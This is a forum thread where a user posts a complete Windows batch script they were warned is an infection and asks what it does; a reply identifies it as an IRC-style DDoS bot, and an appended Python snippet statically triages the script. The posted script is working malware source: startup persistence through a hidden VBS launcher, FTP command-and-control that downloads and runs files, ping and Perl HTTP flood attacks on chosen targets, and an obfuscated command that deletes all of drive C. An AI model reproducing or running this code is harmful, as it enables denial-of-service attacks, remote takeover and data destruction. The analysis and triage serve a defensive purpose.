WinFuture-Forum.de: What does this batch file do? - WinFuture-Forum.de


What does this batch file do? I don't quite understand what the batch file does.


#1 Leislolle

  • Group: Members
  • Posts: 1
  • Joined: 01 April 20
  • Reputation: 0

posted 01 April 2020 - 08:40

I was told that this batch file must be an infection. I have not run it, but I would still like to know how this infection can be stopped. Kind regards, Leislolle | Flo

@echo off
color 08
title IFTP

::Bot
set botfile=quake.bat
set vanishfile=quake.vbs
set botcountfile=botcount
set channel=quakenetsh
set prefix=IDIOT
set startfile=defender.bat
set version=0.1
set DNA=temp

::bot script
:check
set cdbot=%cd%
cd %userprofile%\AppData\Roaming
if not exist %DNA% md %DNA%
cd %DNA%
if not exist Network md Network
cd Network
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/infection
echo get %botfile%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

if not exist %vanishfile% echo CreateObject("Wscript.Shell").Run "%botfile%", 0, False > %vanishfile%

if exist edge.windows set /p botname= < edge.windows

if not exist edge.windows goto setbotname

cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

if not exist %bratfile% (
echo @echo off
echo title IFTP
echo cd %userprofile%\AppData\Roaming\%DNA%\Network
echo if exist %vanishfile% start %vanishfile%
echo exit
) > %startfile%

cd %userprofile%\AppData\Roaming\%DNA%\Network

if not exist s4ve.q echo saved > s4ve.q &&start %vanishfile% &&exit

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

set message=has joined
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
goto command_loader


set /a num1=%random% %% 9
set /a num2=%random% %% 9
set /a num3=%random% %% 99
set /a num4=%random% %% 9
set /a num5=%random% %% 9
set /a num6=%random% %% 9
set /a num7=%random% %% 99
set /a num8=%random% %% 9

if %num1%==0 set bot_num1=N
if %num1%==1 set bot_num1=Q
if %num1%==2 set bot_num1=S
if %num1%==3 set bot_num1=F
if %num1%==4 set bot_num1=T
if %num1%==5 set bot_num1=U
if %num1%==6 set bot_num1=V
if %num1%==7 set bot_num1=K
if %num1%==8 set bot_num1=X
if %num1%==9 set bot_num1=J

if %num4%==0 set bot_num4=N
if %num4%==1 set bot_num4=Q
if %num4%==2 set bot_num4=S
if %num4%==3 set bot_num4=F
if %num4%==4 set bot_num4=T
if %num4%==5 set bot_num4=U
if %num4%==6 set bot_num4=V
if %num4%==7 set bot_num4=K
if %num4%==8 set bot_num4=X
if %num4%==9 set bot_num4=J

if %num6%==0 set bot_num6=N
if %num6%==1 set bot_num6=Q
if %num6%==2 set bot_num6=S
if %num6%==3 set bot_num6=F
if %num6%==4 set bot_num6=T
if %num6%==5 set bot_num6=U
if %num6%==6 set bot_num6=V
if %num6%==7 set bot_num6=K
if %num6%==8 set bot_num6=X
if %num6%==9 set bot_num6=J

if %num8%==0 set bot_num8=N
if %num8%==1 set bot_num8=Q
if %num8%==2 set bot_num8=S
if %num8%==3 set bot_num8=F
if %num8%==4 set bot_num8=T
if %num8%==5 set bot_num8=U
if %num8%==6 set bot_num8=V
if %num8%==7 set bot_num8=K
if %num8%==8 set bot_num8=X
if %num8%==9 set bot_num8=J
set botname=%bot_num1%%num2%%num3%%bot_num4%%bot_num6%%num7%%bot_num8%
echo %botname% > edge.windows
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=has joined
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/infection
echo get %botcountfile%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows


set /p botcount= < %botcountfile%
set /a botcount=%botcount%+1

echo %botcount% > %botcountfile%

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/infection
echo put %botcountfile%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del %botcountfile%
goto check


:command_loader
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.command
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

set /p loading_cm= < input.command
del input.command

if %loading_cm%==PERL_HTTP-NULL set method=HTTP-NULL &&goto HTTP-NULL

if %loading_cm%==ICMP set method=ICMP &&goto POD
if %loading_cm%==QUAKE set method=QUAKE &&goto POD
if %loading_cm%==VOICE set method=VOICE &&goto POD
if %loading_cm%==GLOCK set method=GLOCK &&goto POD

if %loading_cm%==update goto update
if %loading_cm%==status goto Checkstatus
if %loading_cm%==botcount goto howmanybots
if %loading_cm%==kill.bots goto kill_bots
if %loading_cm%==get goto get_file
if %loading_cm%==get%botname% goto get_file
if %loading_cm%==kill%botname% goto kill_bots
if %loading_cm%==desstroy goto desstroy_system
if %loading_cm%==desstroy%botname% goto desstroy_system
if %loading_cm%==delete goto delete_file
if %loading_cm%==start goto start_file
goto command_loader

:desstroy_system
set dse1=R
set dse2=D C:\ 
set dse3=/S 
set dse4=/Q
%dse1%%dse2%%dse3%%dse4%
goto command_loader

:POD
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p target=
set /p threads=
set /p conns=
set /p proxy=
set /p proxylist=
set /p sec=
)
set message=I'm dropping a %method% bomb on %target%
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del input.attack
del #%channel%

:podloop
set /a packet=%random% %% 8000
if %method%==QUAKE set size=%packet%
if %method%==ICMP set size=65500
if %method%==VOICE set size=5000
if %method%==GLOCK set size=15000

ping %target% -l %size% -w 1 -4 -n 1 | FIND "TTL="
if %sec%==0 goto attack_stop
set /a sec=%sec%-1
goto podloop

:attack_stop
(
echo localhost
echo 0
echo 0
echo 0
echo 0 
echo 0 
) > input.attack

echo none > input.command

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo put input.command
echo put input.attack
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
goto command_loader

:installproxielist
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/buildingblocks
echo get %proxylist%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
goto backpointinstallproxielist

:HTTP-NULL
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo cd /%folder%/buildingblocks
echo get %method%.pl
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p target=
set /p threads=
set /p conns=
set /p proxy=
set /p proxylist=
set /p time=
)
set message=[SLURRG! UFO dropping %conns% aliens they attacking the TARGET %target%]
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del input.attack
del #%channel%

if not exist %proxylist% goto installproxielist
:backpointinstallproxielist

(
echo @echo off
echo perl %method%.pl http://%target% %threads% %conns% proxy=%proxy% proxylist=%proxylist%
echo exit
) > %method%.bat
echo CreateObject("Wscript.Shell").Run "%method%.bat", 0, False > %method%.vbs
start %method%.vbs
set /a time=%time%+5
ping 127.0.0.1 -l 35 -n %time% > nul
taskkill /f /im perl.exe
del %method%.bat
del %method%.vbs

(
echo localhost
echo 0
echo 0
echo 0
echo 0 
echo 0 
) > input.attack

echo none > input.command

(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo put input.command
echo put input.attack
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows

goto command_loader

::Update infection
:update
shutdown /r
goto command_loader

::Check status
:Checkstatus
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=Status=Version:%version% Infection:%start_file% DNA:%DNA%
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Delete file
:delete_file
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p filename=
)
set message=%filename% deleted
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del input.attack
if exist %filename% del %filename%
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Start file
:start_file
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p filename=
)
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=%filename% started
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del input.attack
if exist %filename% start %filename%
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Get file
:get_file
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/commands
echo get input.attack
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
< input.attack (
set /p filename=
)
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/buildingblocks
echo get %filename%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=Get %filename%
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del input.attack
ping 127.0.0.1 -l 35 -n 15 > nul
goto command_loader

::Kill bot/s
:kill_bots
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo get #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
set message=Killed
echo * %prefix%-%botname% (@%username%.%date%.%time%) %message% #%channel% >> #%channel%
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/telecom
echo put #%channel%
echo y
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
del data.%DNA%
del data.windows
del #%channel%
del %botfile%
del %vanishfile%
ipconfig /renew
ipconfig /release
exit

0


#2 CaNNoN

  • Group: Active members
  • Posts: 340
  • Joined: 16 November 05
  • Reputation: 48

posted 01 April 2020 - 13:47

Essentially, this thing builds an IRC bot that is then used for various DDoS attacks and/or IRC floods. As far as I could tell from skimming it, some minor changes are also made to the Windows firewall and something is downloaded afterwards via FTP.

Definitely malware.
2
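
A static triage pass over the script from post #1, as an added example that is not part of either forum post: it resolves the `set` variables, lists the files that the generated FTP command scripts fetch or upload, and reports `%names%` that are used but never set. The function names (`expand`, `triage`) are this example's own, and the embedded excerpt is constructed from lines copied out of the posted script.

```python
import re

# Constructed excerpt: lines copied from the batch file posted in #1.
SAMPLE = r"""
set botfile=quake.bat
set channel=quakenetsh
set startfile=defender.bat
set DNA=temp
(
echo open %fsip%
echo %fsun%
echo %fspw%
echo cd /%folder%/infection
echo get %botfile%
echo bye
) > data.%DNA%
ftp -s:data.%DNA% > data.windows
echo cd /%folder%/telecom
echo put #%channel%
if not exist %bratfile% (
) > %startfile%
"""

VAR = re.compile(r"%(\w+)%")
# Variables cmd.exe supplies itself; anything else must come from a `set`.
BUILTIN = {"userprofile", "cd", "random", "username", "date", "time"}

def expand(text, env):
    """Substitute %name% with values seen so far; leave unknown ones as-is."""
    return VAR.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)

def triage(script):
    """Return (variables, ftp transfers, %names% that are never set)."""
    env, transfers, used, remote_dir = {}, [], set(), None
    for line in map(str.strip, script.splitlines()):
        used.update(n.lower() for n in VAR.findall(line))
        m = re.search(r"\bset\s+(?:/[ap]\s+)?(\w+)=(.*?)\s*(?:&&.*)?$", line, re.I)
        if m:
            env[m.group(1).lower()] = expand(m.group(2), env)
            continue
        m = re.match(r"echo\s+(cd|get|put)\s+(\S+)", line, re.I)
        if m and m.group(1).lower() == "cd":
            if m.group(2).startswith("/"):  # remote path inside an ftp script
                remote_dir = expand(m.group(2), env)
        elif m:
            transfers.append((m.group(1).lower(), remote_dir, expand(m.group(2), env)))
    return env, transfers, sorted(used - set(env) - BUILTIN)
```

On the excerpt, `fsip`, `fsun`, `fspw`, `folder` and `bratfile` come back as never set: the posted file contains no `set` line for the FTP server address, the credentials or the remote folder.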
